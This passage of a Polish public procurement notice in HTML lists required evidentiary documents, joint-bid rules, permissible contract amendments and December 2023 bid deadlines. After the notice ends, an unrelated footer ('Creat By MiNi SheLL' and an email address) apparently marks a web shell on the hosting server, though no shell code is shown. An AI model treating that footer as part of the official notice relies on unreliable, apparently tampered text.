publicznego Zamawiający żąda:<br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Ustawy, o braku przynależności do <br/>tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie <br/>konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 ze zm.), z innym wykonawcą, który <br/>złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej <br/>wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od <br/>innego wykonawcy należącego do tej samej grupy kapitałowej, które można sporządzić wg <br/>Załącznika nr 6 do SWZ,<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o <br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Ustawy, sporządzonych nie <br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do <br/>rejestru lub ewidencji.<br/>3) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej <br/>Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w SWZ - składa dokument <br/>lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce <br/>zamieszkania ma osoba, której dokument dotyczy, potwierdzające, że nie otwarto jego <br/>likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł <br/>układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się <br/>on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w <br/>przepisach miejsca wszczęcia tej procedury.<br/>4) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania ma osoba, której <br/>dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt 17.2,3) SWZ, <br/>zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio <br/>oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego <br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, <br/>lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania ma osoba, <br/>której dokument dotyczy nie ma przepisów o oświadczeniu pod przysięgą, złożone przed <br/>organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub <br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. <br/>5) Podmiotowe środki dowodowe, o których mowa w 17.2.1) -17.4 do SWZ składa:<br/>- każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia, w przypadku <br/>wspólnego ubiegania się o zamówienie przez wykonawców;<br/>- podmiot udostępniający zasoby na zasadach art. 118 Ustawy, w przypadku polegania przez <br/>Wykonawcę na zdolnościach lub sytuacji podmiotów udostępniających zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu oceny spełniania przez Wykonawcę warunków udziału w postępowaniu <br/>Zamawiający żąda od Wykonawcy, następujących podmiotowych środków dowodowych:<br/>1) wykazu usług (umów) opisanych w warunku udziału w niniejszym postępowaniu, <br/>wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia <br/>działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i <br/>miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, który <br/>można sporządzić wg Załącznika nr 7 do SWZ, wraz z załączeniem dowodów określających, <br/>czy te usługi zostały wykonane należycie,<br/>2) wykazu osób, skierowanych przez Wykonawcę do realizacji niniejszego zamówienia <br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub <br/>kierowanie robotami, wraz z informacjami na temat ich doświadczenia niezbędnego do <br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności <br/>oraz informacją o podstawie do dysponowania, tymi osobami, który można sporządzić wg <br/>Załącznika nr 8 do SWZ. Dowodami, o których mowa wyżej, są referencje bądź inne <br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli <br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>oświadczenie wykonawcy,<br/>7) Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z <br/>innymi wykonawcami, wykaz usług o którym mowa powyżej, dotyczy usług, w których wykonaniu <br/>Wykonawca ten bezpośrednio uczestniczył.<br/>8) Jeżeli złożone przez Wykonawcę oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy, lub <br/>podmiotowe środki dowodowe budzą wątpliwości Zamawiającego, może on zwrócić się <br/>bezpośrednio do podmiotu, który jest w posiadaniu informacji lub dokumentów istotnych w tym <br/>zakresie dla oceny spełnienia przez Wykonawcę warunków udziału w postępowaniu lub braku <br/>podstaw wykluczenia, o przedstawienie takich informacji lub dokumentów.<br/>9) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać <br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w <br/>rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących <br/>zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 , <br/>dane umożliwiające dostęp do tych środków.<br/>10) Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki <br/>dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę lub <br/>wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych <br/>aktualnych na dzień ich złożenia<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które <br/>Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i <br/>aktualność.<br/>12) Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie <br/>zamówienia, Zamawiający może na każdym etapie postępowania wezwać Wykonawców do <br/>złożenia wszystkich lub niektórych podmiotowych środków dowodowych, jeżeli wymagał ich <br/>złożenia w ogłoszeniu o zamówieniu lub Dokumentach zamówienia, aktualnych na dzień ich <br/>złożenia.<br/>13) Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa w SWZ <br/>składa się w formie elektronicznej, w postaci elektronicznej opatrzonej podpisem zaufanym lub <br/>podpisem osobistym w zakresie i w sposób określony w przepisach wydanych na podstawie art. 70 <br/>Ustawy i rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu <br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów <br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia <br/>publicznego lub konkursie (Dz. U. poz. 2452). <br/>14) Szczegółowe postanowienia, co do formy, zakresu, sposobu składania podmiotowych środków <br/>dowodowych</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Stosownie do art. 125 ust. 4 Ustawy w przypadku wspólnego ubiegania się o zamówienie przez <br/>wykonawców, oświadczenia, o których mowa w art. 125 ust. 1 Ustawy, składa każdy z wykonawców. <br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w <br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w <br/>postępowaniu.<br/> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców ustanawiają oni <br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o <br/>którym mowa w art. 117 ust. 4 Ustawy, które można sporządzić wg Załącznika nr 9 do SWZ, z którego <br/>wynika, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z Art. 455 ust. 1 ustawy Pzp - Dopuszczalna jest zmiana umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia:<br/>1) niezależnie od wartości tej zmiany, o ile została przewidziana w ogłoszeniu o zamówieniu lub dokumentach zamówienia, w postaci jasnych, precyzyjnych i jednoznacznych postanowień umownych, które mogą obejmować postanowienia dotyczące zasad wprowadzania zmian wysokości ceny, jeżeli spełniają one łącznie następujące warunki:<br/>a) określają rodzaj i zakres zmian,<br/>b) określają warunki wprowadzenia zmian,<br/>c) nie przewidują takich zmian, które modyfikowałyby ogólny charakter umowy;<br/>2) gdy nowy wykonawca ma zastąpić dotychczasowego wykonawcę:<br/>a) jeżeli taka możliwość została przewidziana w postanowieniach umownych, o których mowa w pkt 1, lub<br/>b) w wyniku sukcesji, wstępując w prawa i obowiązki wykonawcy, w następstwie przejęcia, połączenia, podziału, <br/>przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia dotychczasowego wykonawcy lub jego <br/>przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego <br/>podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania przepisów ustawy, lub<br/>c) w wyniku przejęcia przez zamawiającego zobowiązań wykonawcy względem jego podwykonawców, w przypadku, o którym mowa w art. 465 ust. 1;<br/>3) jeżeli dotyczy realizacji, przez dotychczasowego wykonawcę, dodatkowych dostaw, usług lub robót budowlanych, <br/>a w przypadku zamówień w dziedzinach obronności i bezpieczeństwa – usług lub robót budowlanych, których nie <br/>uwzględniono w zamówieniu podstawowym, o ile stały się one niezbędne i zostały spełnione łącznie następujące warunki:<br/>a) zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności <br/>dotyczących zamienności lub interoperacyjności wyposażenia, usług lub instalacji zamówionych w ramach zamówienia podstawowego,<br/>b) zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla zamawiającego,<br/>c) wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy, a w przypadku <br/>zamówień w dziedzinach obronności i bezpieczeństwa łączna wartość zmian nie przekracza 50% wartości pierwotnej umowy, z wyjątkiem należycie uzasadnionych przypadków;<br/>4) jeżeli konieczność zmiany umowy spowodowana jest okolicznościami, których zamawiający, działając z należytą <br/>starannością, nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy.<br/>2. Dopuszczalne są również zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, <br/>których łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 10% wartości pierwotnej umowy, w przypadku <br/>zamówień na usługi lub dostawy, albo 15%, w przypadku zamówień na roboty budowlane, a zmiany te nie powodują zmiany ogólnego charakteru umowy.<br/>3. W przypadkach, o których mowa w ust. 1 pkt 3 i 4, zamawiający:<br/>1) nie może wprowadzać kolejnych zmian umowy w celu uniknięcia stosowania przepisów ustawy;<br/>2) po dokonaniu zmiany umowy zamieszcza ogłoszenie o zmianie umowy w Biuletynie Zamówień Publicznych lub <br/>przekazuje Urzędowi Publikacji Unii Europejskiej.<br/>4. Jeżeli umowa zawiera postanowienia dotyczące zasad wprowadzania zmian wysokości cen, dopuszczalną wartość <br/>zmiany ceny, o której mowa w ust. 1 pkt 3 lit. c i pkt 4, lub dopuszczalną wartość zmiany umowy, o której mowa w ust. 2, <br/>ustala się w oparciu o zmienioną cenę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-18 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com